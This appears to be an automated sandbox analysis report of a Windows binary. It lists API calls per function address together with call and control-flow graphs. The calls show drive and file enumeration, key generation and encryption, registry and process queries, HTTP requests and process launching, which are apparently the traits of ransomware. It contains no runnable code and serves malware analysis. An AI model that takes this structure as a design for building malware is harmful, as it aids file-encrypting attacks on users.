f583ddb ExpandEnvironmentStringsW wsprintfW VirtualAlloc GetForegroundWindow 1857->1858 1859 f583fb0 ShellExecuteExW 1858->1859 1860 f583fd1 WaitForSingleObject CloseHandle ExitProcess 1859->1860 1861 f583fb7 1859->1861 1861->1859 1862 f583fbd VirtualFree 1861->1862 1862->1854 1864 f58420d VirtualAlloc 1863->1864 1865 f584228 InitializeCriticalSection 1863->1865 1864->1865 1865->1736 1865->1737 1867 f5841e4 1866->1867 1868 f583ff0 280 API calls 1867->1868 1869 f5841ec 1868->1869 2231 f586620 VirtualFree VirtualFree 1869->2231 1871 f5841f4 1871->1741 1873 f584050 GetDriveTypeW 1872->1873 1874 f584065 1873->1874 1874->1873 1875 f58406a CreateThread 1874->1875 1876 f5840ae WaitForMultipleObjects GetTickCount 1874->1876 1875->1874 1877 f58410f 1876->1877 2232 f585670 VirtualAlloc 1877->2232 1879 f5841bd 1879->1741 1881 f583caa 1880->1881 1882 f583cae GetModuleHandleA GetProcAddress 1880->1882 1881->1743 1883 f583cd0 FreeSid 1882->1883 1883->1743 1885 f583cf0 4 API calls 1884->1885 1886 f5845c4 VirtualAlloc 1885->1886 1888 f58477b 1886->1888 1889 f58477f GetSystemDirectoryW lstrcatW ShellExecuteW 1886->1889 1890 f5847af VirtualFree 1888->1890 1889->1890 1890->1744 1891->1754 1893 f5874a9 VirtualAlloc GetUserNameW 1892->1893 1894 f5874ce 1892->1894 1893->1894 1895 f5874d4 VirtualAlloc GetComputerNameW 1894->1895 1896 f5874f6 1894->1896 1895->1896 1897 f587502 VirtualAlloc 1896->1897 1898 f587556 1896->1898 1897->1898 1899 f587519 1897->1899 1900 f587560 VirtualAlloc RegOpenKeyExW 1898->1900 1901 f5875f5 1898->1901 2021 f587410 RegOpenKeyExW 1899->2021 1905 f58759c RegQueryValueExW 1900->1905 1906 f5875de VirtualFree 1900->1906 1902 f5876f9 1901->1902 1903 f5875ff VirtualAlloc VirtualAlloc 1901->1903 1911 f58775b 1902->1911 1912 f5876ff VirtualAlloc 1902->1912 1907 f587634 wsprintfW RegOpenKeyExW 1903->1907 1909 f5875c9 GetLastError 1905->1909 1910 f5875c0 1905->1910 1906->1901 1914 f587669 RegQueryValueExW 1907->1914 1930 f58768b 1907->1930 1908 f587534 1908->1898 1920 f587551 wsprintfW 1908->1920 1917 f5875cf RegCloseKey 1909->1917 1910->1917 1915 f5877ce 1911->1915 1916 f587761 GetNativeSystemInfo VirtualAlloc 1911->1916 1913 f587410 5 API calls 1912->1913 1918 f58772d 1913->1918 1919 f587694 GetLastError 1914->1919 1914->1930 1929 f5877e8 1915->1929 2026 f587b70 VirtualAlloc VirtualAlloc 1915->2026 1921 f587784 1916->1921 1926 f5877a7 wsprintfW 1916->1926 1917->1901 1917->1906 1918->1911 1933 f587410 5 API calls 1918->1933 1923 f58769a RegCloseKey 1919->1923 1920->1898 1925 f587792 wsprintfW ExitProcess 1921->1925 1921->1926 1923->1930 1924 f5877f9 VirtualAlloc VirtualAlloc GetWindowsDirectoryW GetVolumeInformationW 1931 f587410 5 API calls 1924->1931 1926->1915 1927 f5876d6 wsprintfW VirtualFree 1927->1902 1929->1924 1932 f587939 1929->1932 1930->1907 1930->1923 1930->1925 1930->1927 1937 f587885 1931->1937 1934 f587949 VirtualAlloc 1932->1934 1935 f587af2 1932->1935 1936 f58774e wsprintfW 1933->1936 1954 f5879a0 1934->1954 1938 f587afb VirtualAlloc 1935->1938 1939 f584810 1935->1939 1936->1911 1940 f587889 lstrlenW 1937->1940 1941 f5878ba wsprintfW lstrcatW GetModuleHandleW GetProcAddress 1937->1941 1938->1939 1942 f587b19 1938->1942 1956 f5872a0 1939->1956 1943 f587410 5 API calls 1940->1943 1944 f587914 VirtualFree 1941->1944 1945 f5878fd lstrlenW 1941->1945 2043 f586ff0 1942->2043 1943->1941 1944->1932 1945->1944 1948 f5879c2 GetDriveTypeW 1948->1954 1950 f587b24 VirtualFree 1950->1939 1951 f5879e9 lstrcatW lstrcatW lstrcatW GetDiskFreeSpaceW 1953 f587ac3 lstrcatW 1951->1953 1951->1954 1952 f587ae3 lstrlenW 1952->1935 1953->1954 1954->1948 1954->1951 1954->1952 1955 f587a5c lstrlenW wsprintfW lstrlenW wsprintfW lstrcatW 1954->1955 1955->1954 1959 f5872b0 1956->1959 1957 f58730a 1960 f58732b 1957->1960 1961 f587310 lstrlenW lstrlenW 1957->1961 1958 f5872ef lstrlenW lstrlenW 1958->1957 1959->1957 1959->1958 1962 f58734c 1960->1962 1963 f587331 lstrlenW lstrlenW 1960->1963 1961->1960 1964 f58736d 1962->1964 1965 f587352 lstrlenW lstrlenW 1962->1965 1963->1962 1966 f58738e 1964->1966 1967 f587373 lstrlenW lstrlenW 1964->1967 1965->1964 1968 f5873af 1966->1968 1969 f587394 lstrlenW lstrlenW 1966->1969 1967->1966 1970 f5873d9 1968->1970 1971 f5873be lstrlenW lstrlenW 1968->1971 1969->1968 1972 f5873e2 lstrlenW lstrlenW 1970->1972 1973 f587407 1970->1973 1971->1970 1972->1758 1973->1758 1975 f5870ba lstrcatW lstrcatW lstrcatW lstrcatW 1974->1975 1976 f5870dc 1974->1976 1975->1976 1977 f5870fd 1976->1977 1978 f5870e1 lstrcatW lstrcatW lstrcatW lstrcatW 1976->1978 1979 f58711f 1977->1979 1980 f587103 lstrcatW lstrcatW lstrcatW lstrcatW 1977->1980 1978->1977 1981 f587141 1979->1981 1982 f587125 lstrcatW lstrcatW lstrcatW lstrcatW 1979->1982 1980->1979 1983 f587163 1981->1983 1984 f587147 lstrcatW lstrcatW lstrcatW lstrcatW 1981->1984 1982->1981 1985 f587169 lstrcatW lstrcatW lstrcatW lstrcatW 1983->1985 1986 f587185 1983->1986 1984->1983 1985->1986 1987 f58718b lstrcatW lstrcatW lstrcatW lstrcatW 1986->1987 1988 f5871a7 1986->1988 1987->1988 1989 f5871c9 1988->1989 1990 f5871ad lstrcatW lstrcatW lstrcatW lstrcatW 1988->1990 1991 f5871eb 1989->1991 1992 f5871cf lstrcatW lstrcatW lstrcatW lstrcatW 1989->1992 1990->1989 1993 f58725c 1991->1993 1994 f5871f1 VirtualAlloc 1991->1994 1992->1991 1997 f58727e lstrlenW 1993->1997 1998 f587262 lstrcatW lstrcatW lstrcatW lstrcatW 1993->1998 1995 f58720c wsprintfW 1994->1995 1996 f587221 wsprintfW 1994->1996 1999 f587230 lstrcatW lstrcatW lstrcatW lstrcatW VirtualFree 1995->1999 1996->1999 1997->1762 1998->1997 1999->1993 2001 f587d8b 2000->2001 2002 f587d7f VirtualFree 2000->2002 2003 f587d9d 2001->2003 2004 f587d91 VirtualFree 2001->2004 2002->2001 2005 f587daf 2003->2005 2006 f587da3 VirtualFree 2003->2006 2004->2003 2007 f587dc1 2005->2007 2008 f587db5 VirtualFree 2005->2008 2006->2005 2009 f587dd3 2007->2009 2010 f587dc7 VirtualFree 2007->2010 2008->2007 2011 f587dd9 VirtualFree 2009->2011 2012 f587de5 2009->2012 2010->2009 2011->2012 2013 f587deb VirtualFree 2012->2013 2014 f587df7 2012->2014 2013->2014 2015 f587e09 2014->2015 2016 f587dfd VirtualFree 2014->2016 2017 f587e1b 2015->2017 2018 f587e0f VirtualFree 2015->2018 2016->2015 2019 f5848aa 2017->2019 2020 f587e24 VirtualFree 2017->2020 2018->2017 2019->1710 2019->1711 2020->2019 2022 f58747e 2021->2022 2023 f587432 RegQueryValueExW 2021->2023 2022->1908 2024 f587451 RegCloseKey 2023->2024 2025 f587466 GetLastError RegCloseKey 2023->2025 2024->1908 2025->1908 2027 f587c0c CreateToolhelp32Snapshot 2026->2027 2028 f587c32 2026->2028 2029 f587c3d Process32FirstW 2027->2029 2030 f587c24 VirtualFree 2027->2030 2028->1929 2031 f587d2d VirtualFree FindCloseChangeNotification 2029->2031 2037 f587c5d 2029->2037 2030->2028 2032 f587d4d VirtualFree 2031->2032 2033 f587d57 2031->2033 2032->2033 2033->1929 2034 f587d07 2035 f587d25 2034->2035 2036 f587d15 lstrlenW 2034->2036 2035->2031 2036->2035 2037->2034 2038 f587c9a lstrcpyW lstrcatW 2037->2038 2039 f587caf lstrcatW lstrcatW 2037->2039 2040 f587ce7 Process32NextW 2037->2040 2041 f587cc0 lstrlenW 2038->2041 2039->2041 2040->2034 2042 f587cf8 GetLastError 2040->2042 2041->2040 2042->2034 2042->2037 2053 f587e40 InternetOpenW 2043->2053 2047 f587046 2048 f58704a lstrlenA 2047->2048 2049 f587071 VirtualFree 2047->2049 2048->2049 2050 f58705a wsprintfW 2048->2050 2051 f58708d 2049->2051 2052 f587086 InternetCloseHandle 2049->2052 2050->2049 2051->1939 2051->1950 2052->2051 2054 f58802d InternetOpenW 2053->2054 2055 f587002 VirtualAlloc lstrlenW 2053->2055 2054->2055 2056 f588050 2055->2056 2057 f588069 2056->2057 2058 f588062 InternetCloseHandle 2056->2058 2059 f587e40 2 API calls 2057->2059 2058->2057 2060 f588070 InternetConnectW 2059->2060 2061 f588098 2060->2061 2062 f5880a1 VirtualAlloc wsprintfW HttpOpenRequestW 2060->2062 2061->2047 2063 f5880f1 HttpAddRequestHeadersW 2062->2063 2064 f5881c2 InternetCloseHandle InternetCloseHandle VirtualFree 2062->2064 2063->2064 2065 f588158 HttpSendRequestW 2063->2065 2064->2047 2066 f5881bc GetLastError 2065->2066 2067 f58816f InternetReadFile 2065->2067 2066->2064 2067->2064 2068 f58818e 2067->2068 2068->2064 2069 f588197 InternetReadFile 2068->2069 2069->2068 2070 f5881ba 2069->2070 2070->2064 2071->1782 2073 f586438 CryptGenKey 2072->2073 2074 f586402 GetLastError 2072->2074 2075 f586454 2073->2075 2076 f586455 CryptExportKey CryptExportKey CryptDestroyKey CryptReleaseContext CryptAcquireContextW 2073->2076 2077 f58640f CryptAcquireContextW 2074->2077 2078 f586428 2074->2078 2075->2076 2076->2078 2077->2078 2079 f58642f 2077->2079 2078->1721 2079->2073 2080->1803 2082 f5835f1 2081->2082 2083 f5835f7 GetModuleFileNameW CreateFileW 2081->2083 2082->1827 2084 f58369a VirtualFree 2083->2084 2085 f583623 GetFileSize VirtualAlloc 2083->2085 2084->1827 2086 f583641 ReadFile 2085->2086 2087 f583693 FindCloseChangeNotification 2085->2087 2088 f583685 VirtualFree 2086->2088 2089 f583656 2086->2089 2087->2084 2088->2087 2089->2088 2090 f583667 2089->2090 2116 f5834f0 lstrlenA VirtualAlloc 2090->2116 2094 f585c40 CryptBinaryToStringA 2093->2094 2095 f585f33 GetModuleHandleA 2093->2095 2094->1838 2094->1839 2096 f585f42 GetProcAddress lstrlenA 2095->2096 2097 f585f76 _memset 2095->2097 2099 f585f65 wsprintfA 2096->2099 2098 f585f90 lstrlenA 2097->2098 2100 f585fa8 2098->2100 2099->2097 2101 f585fb8 VirtualFree 2100->2101 2101->2094 2103 f587e40 2 API calls 2102->2103 2104 f585509 2103->2104 2123 f585220 VirtualAlloc 2104->2123 2107 f58554d lstrcatA lstrlenA lstrlenW lstrlenA 2109 f588050 15 API calls 2107->2109 2110 f5855f4 2109->2110 2111 f585629 VirtualFree VirtualFree VirtualFree 2110->2111 2132 f5853d0 lstrlenA VirtualAlloc 2110->2132 2112 f58565d 2111->2112 2113 f585656 InternetCloseHandle 2111->2113 2112->1847 2112->1848 2113->2112 2115 f585615 2115->2111 2117 f583528 CryptStringToBinaryA 2116->2117 2118 f5835af 2116->2118 2119 f58353f VirtualAlloc VirtualAlloc 2117->2119 2120 f5835a1 VirtualFree 2117->2120 2118->2088 2121 f58356f 2119->2121 2122 f583576 wsprintfW wsprintfW 2119->2122 2120->2118 2121->2122 2122->2120 2124 f58529b 2123->2124 2125 f585341 lstrlenA VirtualAlloc VirtualAlloc 2123->2125 2126 f5852cb lstrlenW VirtualAlloc 2124->2126 2127 f5852c0 Sleep 2124->2127 2125->2107 2166 f585060 CreatePipe 2126->2166 2127->2126 2129 f5852f6 lstrcmpiA 2130 f585309 VirtualFree 2129->2130 2131 f58531e wsprintfW VirtualFree 2129->2131 2130->2124 2131->2125 2133 f585403 CryptStringToBinaryA 2132->2133 2135 f585429 2133->2135 2136 f5854dc GetLastError 2133->2136 2137 f585f00 7 API calls 2135->2137 2138 f5854c3 VirtualFree 2136->2138 2139 f585433 2137->2139 2138->2115 2197 f5833e0 2139->2197 2142 f58544d 2145 f585498 2142->2145 2146 f58546f lstrlenA VirtualAlloc 2142->2146 2143 f5854e4 2207 f585350 VirtualAlloc VirtualAlloc 2143->2207 2148 f5854b4 2145->2148 2152 f5854ac HeapFree 2145->2152 2146->2145 2147 f585490 lstrcpyA 2146->2147 2147->2145 2150 f5854c0 2148->2150 2154 f5854bd HeapFree 2148->2154 2150->2138 2152->2148 2154->2150 2167 f585179 SetHandleInformation 2166->2167 2168 f58516f 2166->2168 2167->2168 2169 f58518f CreatePipe SetHandleInformation 2167->2169 2168->2129 2169->2168 2170 f5851b5 VirtualAlloc 2169->2170 2171 f5851cf wsprintfW 2170->2171 2172 f585204 lstrcpyA 2170->2172 2177 f584e10 2171->2177 2172->2129 2174 f5851e4 2182 f584fb0 2174->2182 2188 f589170 2177->2188 2180 f584e79 GetLastError 2180->2174 2181 f584e84 CloseHandle CloseHandle 2181->2174 2187 f584fbd 2182->2187 2183 f584fc6 ReadFile 2184 f585035 2183->2184 2183->2187 2185 f585053 VirtualFree 2184->2185 2190 f584ea0 2184->2190 2185->2129 2187->2183 2187->2184 2189 f584e2e CreateProcessW 2188->2189 2189->2180 2189->2181 2193 f584ecb 2190->2193 2191 f584f05 lstrcpyA 2191->2185 2192 f584f63 lstrlenA 2194 f584f70 lstrcpyA 2192->2194 2193->2191 2193->2192 2195 f584f5d 2193->2195 2194->2185 2195->2191 2211 f5832b0 lstrlenA 2197->2211 2200 f5834d9 ExitProcess 2201 f583407 2203 f583412 2201->2203 2205 f583483 lstrlenA GetProcessHeap HeapAlloc 2201->2205 2215 f583190 2201->2215 2219 f583200 2201->2219 2203->2142 2203->2143 2205->2201 2206 f5834a5 lstrcpyA 2205->2206 2206->2201 2208 f5853b9 ExitProcess 2207->2208 2209 f585380 GetModuleFileNameW 2207->2209 2209->2208 2210 f585392 wsprintfW ShellExecuteW 2209->2210 2210->2208 2212 f5832f8 2211->2212 2213 f5832cf 2211->2213 2212->2200 2212->2201 2214 f5832d0 lstrlenA 2213->2214 2214->2212 2214->2214 2216 f5831b0 lstrcmpiA lstrcmpiA 2215->2216 2218 f58319e 2215->2218 2216->2201 2217 f5831f1 2217->2201 2218->2216 2218->2217 2221 f583210 2219->2221 2220 f58323d 2220->2201 2221->2220 2222 f58326d 2221->2222 2223 f583250 lstrlenA GetProcessHeap HeapAlloc 2221->2223 2225 f583299 2222->2225 2226 f583272 lstrlenA GetProcessHeap HeapAlloc 2222->2226 2224 f58328d 2223->2224 2224->2225 2227 f583291 lstrcpyA 2224->2227 2225->2201 2226->2224 2227->2225 2229 f589170 _memset 2228->2229 2230 f583d47 VerSetConditionMask VerSetConditionMask VerSetConditionMask VerifyVersionInfoW 2229->2230 2230->1855 2231->1871 2233 f58569f wsprintfW 2232->2233 2260 f583bc0 GetProcessHeap 2233->2260 2236 f5856f1 2237 f587490 96 API calls 2236->2237 2238 f5856fc 2237->2238 2239 f5872a0 16 API calls 2238->2239 2240 f585707 lstrlenW 2239->2240 2241 f5870a0 49 API calls 2240->2241 2242 f58571d lstrlenW 2241->2242 2243 f58573f lstrlenW VirtualAlloc 2242->2243 2244 f585731 VirtualFree 2242->2244 2245 f585762 wsprintfA 2243->2245 2246 f585776 2243->2246 2244->2243 2245->2246 2247 f585f00 7 API calls 2246->2247 2248 f585785 CryptBinaryToStringA 2247->2248 2249 f5857a8 GetLastError 2248->2249 2250 f5857ae lstrlenA VirtualAlloc lstrlenA 2248->2250 2249->2250 2251 f5857da lstrlenA 2250->2251 2253 f58580e 2251->2253 2257 f5857f1 lstrlenA 2251->2257 2254 f5854f0 100 API calls 2253->2254 2256 f58581b VirtualFree 2254->2256 2258 f587d70 10 API calls 2256->2258 2257->2253 2259 f58584a VirtualFree 2258->2259 2259->1879 2260->2236 2282 f582f50 K32EnumDeviceDrivers 2261->2282 2263 f582d8c 2264 f582de9 GetModuleHandleW LoadCursorW LoadIconW RegisterClassExW 2263->2264 2267 f582f50 6 API calls 2263->2267 2265 f582e7b GetModuleHandleW GetModuleHandleW CreateWindowExW SetWindowLongW 2264->2265 2266 f582e75 ExitThread 2264->2266 2268 f582ebe ExitThread 2265->2268 2269 f582ec5 ShowWindow UpdateWindow CreateThread 2265->2269 2270 f582d99 2267->2270 2271 f582eed CloseHandle 2269->2271 2272 f582ef4 GetMessageW 2269->2272 2270->2264 2275 f582f50 6 API calls 2270->2275 2271->2272 2273 f582f0b 2272->2273 2274 f582f3d ExitThread 2272->2274 2276 f582f17 TranslateMessage DispatchMessageW 2273->2276 2277 f582dce 2275->2277 2276->2274 2278 f582f2c GetMessageW 2276->2278 2277->2274 2291 f5830a0 2277->2291 2278->2274 2278->2276 2283 f582f7d 2282->2283 2284 f582f82 VirtualAlloc 2282->2284 2283->2263 2285 f582f99 2284->2285 2286 f582f9f K32EnumDeviceDrivers 2284->2286 2285->2263 2287 f582ff2 VirtualFree 2286->2287 2289 f582fae 2286->2289 2287->2263 2288 f582fc0 K32GetDeviceDriverBaseNameW 2288->2289 2289->2287 2289->2288 2290 f583009 VirtualFree 2289->2290 2290->2263 2292 f582f50 6 API calls 2291->2292 2293 f583151 2292->2293 2294 f582ddb 2293->2294 2295 f582f50 6 API calls 2293->2295 2294->2274 2300 f582ad0 VirtualAlloc 2294->2300 2296 f583160 2295->2296 2296->2294 2297 f582f50 6 API calls 2296->2297 2298 f58316c 2297->2298 2298->2294 2299 f582f50 6 API calls 2298->2299 2299->2294 2301 f582b02 GetModuleFileNameW GetTempPathW 2300->2301 2303 f582b48 2301->2303 2304 f582b4c 2303->2304 2305 f582b53 lstrlenW 2303->2305 2328 f582960 lstrlenW 2304->2328 2316 f5882b0 CryptAcquireContextW 2305->2316 2307 f582b8e GetEnvironmentVariableW 2309 f582bac 2307->2309 2311 f582bd8 lstrcatW lstrcatW lstrcatW 2309->2311 2313 f582bb0 2309->2313 2310 f582c45 ExitThread 2333 f582890 CreateFileW 2311->2333 2314 f582c2f wsprintfW 2313->2314 2314->2304 2315 f582c02 2315->2310 2315->2314 2317 f5883c9 2316->2317 2318 f5882db VirtualAlloc 2316->2318 2317->2307 2320 f58830b 2318->2320 2321 f5883d2 CryptReleaseContext VirtualFree 2318->2321 2320->2321 2322 f588313 GetModuleHandleA 2320->2322 2321->2307 2323 f588359 LoadLibraryA 2322->2323 2324 f588367 GetProcAddress 2322->2324 2323->2324 2325 f5883ae 2323->2325 2324->2325 2327 f588376 2324->2327 2326 f5883b0 CryptReleaseContext VirtualFree 2325->2326 2326->2317 2327->2325 2327->2326 2329 f5882b0 9 API calls 2328->2329 2330 f5829ad RegCreateKeyExW 2329->2330 2331 f582a8e lstrlenW RegSetValueExW RegCloseKey 2330->2331 2332 f582ac0 2330->2332 2331->2310 2332->2310 2334 f5828b8 GetFileSize 2333->2334 2335 f5828f9 2333->2335 2350 f583030 2334->2350 2335->2315 2338 f583030 6 API calls 2339 f5828d5 CreateFileMappingW 2338->2339 2340 f582902 MapViewOfFile 2339->2340 2341 f5828f2 CloseHandle 2339->2341 2342 f582948 CloseHandle CloseHandle 2340->2342 2343 f582916 2340->2343 2341->2335 2342->2315 2344 f583030 6 API calls 2343->2344 2345 f58291b 2344->2345 2346 f58292b 2345->2346 2355 f588400 CryptAcquireContextW 2345->2355 2366 f582830 CreateFileW 2346->2366 2351 f582f50 6 API calls 2350->2351 2352 f58307f 2351->2352 2353 f5828c8 2352->2353 2354 f582f50 6 API calls 2352->2354 2353->2338 2354->2353 2356 f5884f2 2355->2356 2357 f58842e 2355->2357 2356->2346 2357->2357 2358 f58843d VirtualAlloc 2357->2358 2359 f588458 2358->2359 2360 f5884fb CryptReleaseContext VirtualFree 2358->2360 2359->2360 2361 f588461 GetModuleHandleA 2359->2361 2360->2346 2362 f5884b5 GetProcAddress 2361->2362 2363 f5884a7 LoadLibraryA 2361->2363 2364 f5884d9 CryptReleaseContext VirtualFree 2362->2364 2365 f5884c4 2362->2365 2363->2362 2363->2364 2364->2356 2365->2364 2367 f58285b 2366->2367 2368 f58287f UnmapViewOfFile 2366->2368 2369 f58285f WriteFile 2367->2369 2370 f582873 2367->2370 2368->2342 2369->2370 2371 f582878 CloseHandle 2369->2371 2370->2371 2371->2368 2379 f586f40 VirtualAlloc wsprintfW InitializeCriticalSection VirtualAlloc 2382 f586df0 2379->2382 2381 f586fd0 VirtualFree ExitThread 2399 f586780 VirtualAlloc 2382->2399 2384 f586e06 2385 f586f34 2384->2385 2411 f586ba0 lstrlenW lstrcatW FindFirstFileW 2384->2411 2385->2381 2387 f586e15 2387->2385 2388 f586e22 lstrlenW lstrcatW FindFirstFileW 2387->2388 2389 f586e58 2388->2389 2390 f586e64 2388->2390 2389->2381 2391 f586e70 lstrcmpW 2390->2391 2392 f586e8a lstrcmpW 2391->2392 2393 f586f13 FindNextFileW 2391->2393 2392->2393 2394 f586ea0 lstrcatW 2392->2394 2393->2391 2395 f586f2b FindClose 2393->2395 2396 f586ecc 2394->2396 2397 f586eb3 lstrcatW 2394->2397 2395->2385 2396->2393 2398 f586df0 25 API calls 2397->2398 2398->2396 2401 f5867a7 2399->2401 2400 f5868d4 VirtualFree 2400->2384 2401->2400 2402 f58684f SHGetSpecialFolderPathW 2401->2402 2403 f58686d SHGetSpecialFolderPathW 2402->2403 2404 f586860 2402->2404 2405 f58687a 2403->2405 2406 f586887 SHGetSpecialFolderPathW 2403->2406 2404->2400 2404->2403 2405->2400 2405->2406 2407 f5868a1 SHGetSpecialFolderPathW 2406->2407 2408 f586894 2406->2408 2409 f5868bb VirtualFree 2407->2409 2410 f5868ae 2407->2410 2408->2400 2408->2407 2409->2384 2410->2400 2410->2409 2412 f586bf0 lstrcmpW 2411->2412 2413 f586d12 FindNextFileW 2412->2413 2414 f586c06 lstrcmpW 2412->2414 2413->2412 2415 f586d2a FindClose 2413->2415 2414->2413 2416 f586c1c lstrcatW lstrlenW 2414->2416 2415->2387 2417 f586c3f 2416->2417 2417->2413 2418 f586c54 lstrcmpW 2417->2418 2421 f586cf2 CloseHandle 2417->2421 2423 f586ce1 VirtualFree 2417->2423 2424 f586cc9 lstrlenA 2417->2424 2418->2417 2419 f586c64 CreateFileW GetFileSize 2418->2419 2420 f586c91 VirtualAlloc 2419->2420 2419->2421 2420->2417 2422 f586ca6 ReadFile 2420->2422 2421->2415 2421->2417 2422->2417 2422->2423 2423->2417 2426 f586b40 lstrlenA 2424->2426 2427 f586b5a 2426->2427 2427->2417 2428 f589200 IsProcessorFeaturePresent 2429 f589226 2428->2429 2430 f584dc0 2431 f584dd9 2430->2431 2432 f584ddd CreateThread 2430->2432 2432->2431 2433 f584dfb CloseHandle 2432->2433 2433->2431 2434 f586ac2 VirtualAlloc wsprintfW 2440 f5869b0 2434->2440 2436 f586aea 2439 f586b03 2436->2439 2448 f5868f0 lstrlenW lstrlenW 2436->2448 2437 f586b15 VirtualFree 2439->2437 2441 f5869ca lstrlenW 2440->2441 2442 f5869c0 2440->2442 2443 f5869de 2441->2443 2444 f5869f0 2441->2444 2442->2436 2443->2444 2445 f5869fb lstrlenW VirtualAlloc wsprintfW 2443->2445 2444->2436 2447 f586a38 VirtualFree 2445->2447 2447->2436 2449 f58691e lstrcmpiW 2448->2449 2452 f58690c 2448->2452 2450 f58693c lstrcmpiW 2449->2450 2451 f586933 2449->2451 2450->2451 2453 f586948 lstrcmpiW 2450->2453 2451->2439 2452->2449 2453->2451 2454 f586954 lstrcmpiW 2453->2454 2454->2451 2455 f586960 lstrcmpiW 2454->2455 2455->2451 2456 f58696c lstrcmpiW 2455->2456 2456->2451 2457 f586978 lstrcmpiW 2456->2457 2457->2451 2458 f586984 lstrcmpiW 2457->2458 2458->2451 2459 f586990 lstrcmpiW 2458->2459 2459->2439 2460 f586682 CryptAcquireContextW 2461 f58669b GetLastError 2460->2461 2462 f5866d1 CryptImportKey 2460->2462 2463 f5866a8 CryptAcquireContextW 2461->2463 2464 f5866c1 2461->2464 2465 f586755 CryptReleaseContext LeaveCriticalSection 2462->2465 2466 f5866f6 CryptGetKeyParam CryptEncrypt GetLastError 2462->2466 2463->2464 2467 f5866c8 2463->2467 2465->2464 2466->2465 2468 f58674d 2466->2468 2467->2462 2468->2465 2491 f584da5 2494 f586620 VirtualFree VirtualFree 2491->2494 2493 f584db4 2494->2493 2495 f5843a6 2496 f5843b0 2495->2496 2497 f584456 2496->2497 2498 f5843e0 lstrcpyW lstrlenW 2496->2498 2499 f584578 VirtualFree 2497->2499 2500 f584547 VirtualAlloc 2497->2500 2498->2496 2498->2497 2502 f587d70 10 API calls 2499->2502 2500->2499 2501 f584564 wsprintfW 2500->2501 2501->2499 2503 f584598 2502->2503

                                    Callgraph

                                    • Executed
                                    • Not Executed
                                    • Opacity -> Relevance
                                    • Disassembly available
                                    callgraph 0 Function_0F585350 1 Function_0F588050 8 Function_0F587E40 1->8 2 Function_0F586550 76 Function_0F5863E0 2->76 3 Function_0F582F50 4 Function_0F582C50 5 Function_0F588F54 6 Function_0F589049 7 Function_0F586B40 9 Function_0F586F40 73 Function_0F586DF0 9->73 10 Function_0F584A78 11 Function_0F583879 12 Function_0F58377E 45 Function_0F581020 12->45 13 Function_0F587D70 14 Function_0F585E70 15 Function_0F587B70 16 Function_0F583C70 17 Function_0F589170 18 Function_0F585670 18->13 30 Function_0F585F00 18->30 63 Function_0F583BC0 18->63 66 Function_0F5854F0 18->66 81 Function_0F587490 18->81 96 Function_0F5870A0 18->96 97 Function_0F5872A0 18->97 19 Function_0F588D71 20 Function_0F586E69 20->73 21 Function_0F585860 21->13 21->30 61 Function_0F5835C0 21->61 21->63 21->66 21->81 21->96 21->97 22 Function_0F582960 91 Function_0F5882B0 22->91 23 Function_0F585060 27 Function_0F584E10 23->27 86 Function_0F584FB0 23->86 24 Function_0F588260 25 Function_0F587B60 26 Function_0F582D10 27->17 28 Function_0F587410 29 Function_0F588400 30->14 30->17 57 Function_0F585DC0 30->57 31 Function_0F589200 32 Function_0F586500 33 Function_0F584B00 34 Function_0F583200 35 Function_0F584200 36 Function_0F582830 37 Function_0F583030 37->3 38 Function_0F582D30 38->3 52 Function_0F582AD0 38->52 95 Function_0F5830A0 38->95 39 Function_0F588F2C 40 Function_0F584B20 40->2 40->16 40->21 40->32 40->33 40->35 40->38 49 Function_0F5841D0 40->49 51 Function_0F5847D0 40->51 58 Function_0F5864C0 40->58 59 Function_0F5848C0 40->59 74 Function_0F583FF0 40->74 87 Function_0F5845B0 40->87 88 Function_0F583DB0 40->88 90 Function_0F5842B0 40->90 41 Function_0F583320 42 Function_0F586620 43 Function_0F585220 43->23 44 Function_0F581C20 46 Function_0F588B20 47 Function_0F588520 48 Function_0F589124 49->42 49->74 78 Function_0F5865E0 49->78 50 Function_0F5853D0 50->0 50->1 50->8 50->30 50->43 50->50 77 Function_0F5833E0 50->77 51->13 51->63 51->81 51->96 51->97 52->22 75 Function_0F5881F0 52->75 82 Function_0F582890 52->82 52->91 53 Function_0F5836D0 53->45 54 Function_0F586DD5 55 Function_0F588DCC 56 Function_0F588ECE 57->17 60 Function_0F584DC0 69 Function_0F5834F0 61->69 62 Function_0F5836C0 64 Function_0F586AC2 72 Function_0F5868F0 64->72 92 Function_0F5869B0 64->92 65 Function_0F588EFE 66->1 66->8 66->43 66->50 67 Function_0F588AF0 68 Function_0F583CF0 68->17 70 Function_0F585FF0 79 Function_0F585FE0 70->79 71 Function_0F586FF0 71->1 71->8 73->73 84 Function_0F586780 73->84 99 Function_0F586BA0 73->99 74->18 77->34 77->41 83 Function_0F583190 77->83 89 Function_0F5832B0 77->89 80 Function_0F586D9A 81->15 81->28 81->71 93 Function_0F588AB0 81->93 82->29 82->36 82->37 84->75 85 Function_0F586682 85->62 86->67 98 Function_0F584EA0 86->98 87->68 88->16 88->68 90->13 90->63 90->75 90->81 90->96 90->97 94 Function_0F588DA8 95->3 99->7 99->24 100 Function_0F588FA4 101 Function_0F584DA5 101->42 102 Function_0F5843A6 102->13 102->75

                                    Control-flow Graph

                                    • Executed
                                    • Not Executed
                                    control_flow_graph 92 f585860-f5858ec call f583bc0 call f587490 call f5872a0 VirtualAlloc 99 f5858ee-f5858f0 92->99 100 f585901-f585905 92->100 99->100 101 f5858f2-f5858ff 99->101 102 f585907-f585916 100->102 101->102 103 f585918-f58591d 102->103 104 f58592f-f585931 102->104 103->104 105 f58591f-f58592d 103->105 106 f585935-f58593e 104->106 105->106 107 f58594d-f58594f 106->107 108 f585940-f58594b 106->108 109 f585953-f58595b 107->109 108->107 108->109 110 f585d98-f585db9 VirtualFree call f587d70 109->110 111 f585961-f5859de CryptBinaryToStringA * 2 lstrlenA * 2 VirtualAlloc lstrlenA 109->111 113 f5859e0-f5859e2 111->113 114 f5859f5 111->114 113->114 116 f5859e4-f5859f3 113->116 117 f5859fd-f585a06 lstrlenA 114->117 116->117 118 f585a08-f585a0e 117->118 119 f585a10 117->119 118->119 120 f585a18-f585a22 lstrlenA 118->120 119->120 121 f585a4e-f585a55 lstrlenA 120->121 122 f585a24-f585a28 120->122 124 f585a7e-f585ac7 lstrcatW lstrlenW call f5870a0 call f5835c0 121->124 125 f585a57-f585a5f 121->125 123 f585a30-f585a39 122->123 127 f585a3b-f585a3d 123->127 128 f585a42-f585a48 lstrlenA 123->128 138 f585ac9-f585aca ExitProcess 124->138 139 f585ad0-f585bc9 lstrcatW * 4 VirtualFree * 2 lstrcatW lstrlenW lstrlenA MultiByteToWideChar 